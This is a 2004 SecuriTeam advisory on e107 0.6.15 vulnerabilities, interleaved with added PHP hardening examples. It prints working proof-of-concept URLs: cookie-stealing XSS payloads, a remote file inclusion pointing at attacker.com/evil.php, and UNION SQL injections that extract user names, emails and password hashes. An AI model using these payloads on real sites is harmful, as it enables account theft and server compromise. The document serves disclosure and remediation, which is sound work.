[UNIX] e107 Multiple Vulnerabilities (Path Disclosures, File Inclusions and SQL Injections)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/30/04

    To: list@securiteam.com
    Date: 30 May 2004 19:41:56 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

    - - - - - - - - -

    e107 Multiple Vulnerabilities (Path Disclosures, File Inclusions and SQL Injections)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://e107.org/> e107 is a portal / content management system powered
    by PHP and MySQL that gives you a totally dynamic and professional website
    out of the box. Its simple wizard-type install process will have you up
    and running in 5 minutes, and best of all it's completely free."

    e107 is vulnerable to multiple types of attacks including: path
    disclosures, file inclusions and SQL injections.

    DETAILS

    Vulnerable Systems:
     * e107 version 0.6.15, possibly prior

    Immune Systems:
     * e107 version 0.6.16

    In order to be able to exploit some of these vulnerabilities, the
    following conditions must be met:
     * "register_globals" must be "on"
     * MySQL must be version 4.x with enabled UNION functionality (although on
    some occasions one can work around this.)

    Full Path Disclosure
    Many software developers, webmasters, admins and other IT staff
    underestimate full path disclosure as a security bug. They shouldn't: it
    gives an attacker valuable information which, combined with other
    information-gathering attacks, can lead to a successful compromise of a
    host.

    This could be one of the reasons why many systems contain partial and full
    path disclosure vulnerabilities. Usually this is possible because scripts
    can be requested directly by the malicious user, producing a PHP error
    message that tends to reveal ample information about the system, such as
    the script's location on the filesystem.

    Examples follow:
    http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
    http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
    http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
    http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
    http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php
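    The two defences a defender wants against the pattern above (an include-only plugin file requested directly, failing, and printing its path in a PHP error) are shown below. This is an added example, not e107's own code; the marker constant name `E107_INIT_OK` is an assumption chosen for the illustration, and both halves are shown in one file for brevity although they live in the front controller and in each plugin file respectively.

```php
<?php
// Added example, not e107's own code. Two defences against the
// "request the plugin file directly, get a PHP error with the full path"
// problem. The constant name E107_INIT_OK is an assumption.

// --- front controller (e.g. index.php) --------------------------------
// Files that must only ever be included, never requested, check for this
// constant. Define it before the first include runs.
define('E107_INIT_OK', true);

// Never render PHP errors to the browser; keep them in the server log,
// where the full path is useful to the admin and invisible to a visitor.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// --- top of an include-only file (e.g. a *_menu.php plugin) -----------
// If the constant is missing, this file was hit directly: stop before any
// code that depends on the application's globals can fail and leak a path.
if (!defined('E107_INIT_OK')) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// ... plugin code that relies on $sql, $pref and LAN_* constants follows ...
```

    The guard is cheap and makes the direct request a clean 403 instead of a stack of "undefined variable" notices; the `display_errors` setting covers every other error path you did not think of.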

    Cross-site Scripting
    Using XSS it is possible to steal credentials and cookies, read
    cross-domain forms etc. An XSS vulnerability exists in the following
    locations:

     * In 'clock_menu.php', the following example performs cross site
    scripting:
    http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

     * In the "email article to a friend" feature, an XSS vulnerability
    exists if the attacker is logged off and enters script code into the
    input field, like so:
    foobar'><body onload=a!ert(document.cookie);>

     * The same type of problem exists in the "submit news" feature:
    foobar'><body onload=a!ert(document.cookie);>

     * In the user settings script, an attacker who is logged on issues a POST
    request such as the following, which triggers an XSS:
    http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]
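    The `clock_menu.php` case above is instructive because the injected value reaches an inline `<script>` block, where HTML encoding alone is not the right escape, and because `register_globals` lets a query parameter overwrite a language string that was never meant to come from the request. The following added example (not e107's code; the payload string is constructed to mirror the advisory's shape) shows context-appropriate output encoding for both the HTML and the JavaScript-string contexts, next to the vulnerable form:

```php
<?php
// Added example, not e107's own code. Renders an untrusted string into HTML
// and into an inline script with encoding that matches each context.

function render_html_text(string $s): string
{
    // HTML body/attribute context: encode &, <, >, " and ' so a value such as
    // foobar'><body onload=...> cannot close the attribute it sits in.
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_js_string(string $s): string
{
    // JavaScript string context: emit a quoted JS literal with < > & ' "
    // as \uXXXX escapes, so "</script>" inside the value can never end the block.
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Constructed input with the same shape as the advisory's clock_menu payload.
$label = 'foo"); //--></script><script>alert(document.cookie)</script>';

// Vulnerable form: the raw string is spliced straight into script source.
//   echo '<script>document.write("' . $label . '");</script>';

// Hardened forms, one per output context.
echo '<p>' . render_html_text($label) . "</p>\n";
echo '<script>document.write(' . render_js_string($label) . ");</script>\n";

// The language string itself must come from the language file, defined as a
// constant before any plugin is included, never from the request.
define('LAN_407', 'Time');
```

    With `register_globals` off the `LAN_407=...` query parameter never becomes a variable at all; the encoding above is the second layer that holds even when a value legitimately does come from user input, as in the "submit news" and "email to a friend" forms.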

    Remote File Inclusion
    If PHP is configured with "allow_url_fopen=on" and there is no firewall
    which blocks outbound traffic, then an attacker can force execution of PHP
    code on the target host. This can lead to shell-level server compromise
    (if there are permissions to execute system commands) with "nobody" or
    "apache" privileges. From there, local root exploits can be run and the
    server will be completely compromised. The problem is located in the
    'secure_img_render.php' script.

    Example:
    http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php

    Note: This requires that "register globals" be ON in order to be
    effective.
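    The root cause in the class of bug described above is a request-controlled value reaching `include()`; turning off `allow_url_fopen` (and `register_globals`) limits the damage, but the code-level fix is to stop treating the parameter as a path at all. The following is an added example, not e107's `secure_img_render.php`: the parameter name `p` is taken from the advisory's URL, while the image directory, the allowlisted file names and the function name are assumptions.

```php
<?php
// Added example, not e107's own code. The directory and file names are
// assumptions for illustration; only the parameter name "p" is from the advisory.

// Vulnerable shape the advisory describes: a request value is included, and
// with allow_url_fopen=on it may be a remote URL.
//   include($p);

// Hardened: map the request value onto a fixed directory and an explicit
// allowlist, then serve the bytes instead of executing them.
function resolve_secure_image(string $name): string
{
    $base = realpath(__DIR__ . '/images');           // assumed image directory
    $allowed = ['captcha.png', 'logo.png'];          // assumed allowlist
    if ($base === false || !in_array($name, $allowed, true)) {
        throw new InvalidArgumentException('unknown image');
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    // realpath() collapses ../ and symlinks; reject anything outside $base.
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('path outside image directory');
    }
    return $path;
}

// Read the parameter explicitly rather than relying on register_globals.
$p = isset($_GET['p']) ? (string) $_GET['p'] : '';
try {
    $file = resolve_secure_image($p);
    header('Content-Type: image/png');
    readfile($file);        // send file contents; never include() them
} catch (Throwable $e) {
    http_response_code(404);
    // Log $e->getMessage() server-side; do not echo it (see path disclosure above).
}
```

    Note that `readfile()` replaces `include()`: even if the allowlist check were bypassed, the server would return bytes rather than interpret them as PHP.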

    SQL Injection
    The following locations contain SQL injection bugs:

     * The 'content.php' script, which can be exploited in the following
    manner:
    http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null, null, null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

     * Another SQL injection in the same script but done differently:
    http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null, null, null%20FROM%20e107_user%20WHERE%20user_id=1/*

     * In the 'news.php' script:
    http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null, null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
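    All three injections above share one shape: a numeric record id taken from the query string is concatenated into a `SELECT`, so `99/**/UNION/**/SELECT...` rides along as SQL. The fix is to validate the id as an integer and bind it as a parameter. This is an added example, not e107's code: the table name `e107_content` and the column names are assumptions, the connection details are placeholders, and the way the query string is split on the first `.` follows the advisory's URL shape (`content.99`) rather than e107's real routing.

```php
<?php
// Added example, not e107's own code. Table and column names, the query-string
// split and the connection details are assumptions/placeholders.

// Vulnerable shape behind content.php?content.99/**/UNION/**/SELECT...:
//   $raw_id = "99/**/UNION/**/SELECT ...";              // from the URL
//   mysql_query("SELECT * FROM e107_content WHERE content_id=" . $raw_id);

// Hardened: reject anything that is not a plain integer, then bind it.
function fetch_content(mysqli $db, string $raw_id): ?array
{
    // A decimal integer of reasonable length; "99/**/UNION..." fails here.
    if (!preg_match('/^\d{1,10}$/', $raw_id)) {
        return null;
    }
    $id = (int) $raw_id;
    $stmt = $db->prepare(
        'SELECT content_id, content_heading, content_text FROM e107_content WHERE content_id = ?'
    );
    $stmt->bind_param('i', $id);   // 'i' binds as integer; no SQL is spliced
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Split "content.99" into an action and a raw id, mirroring the URL shape.
$query = $_SERVER['QUERY_STRING'] ?? '';
[$action, $raw_id] = array_pad(explode('.', $query, 2), 2, '');

// Placeholders: replace with the site's real credentials.
$db = new mysqli('localhost', 'DB_USER', 'DB_PASSWORD', 'e107');
$row = fetch_content($db, $raw_id);
if ($row === null) {
    http_response_code(404);
}
```

    The regular expression is the cheap first line: it stops the `UNION` payload before any SQL is built. The prepared statement is the one that matters, because it keeps the id out of the SQL text entirely, so the MySQL 4.x `UNION` precondition from the advisory no longer has anything to attach to.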

    Patch Availability:
    The above-mentioned problems have been fixed in version 0.6.16. All users
    of the system are highly encouraged to upgrade their version.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
    Vind.


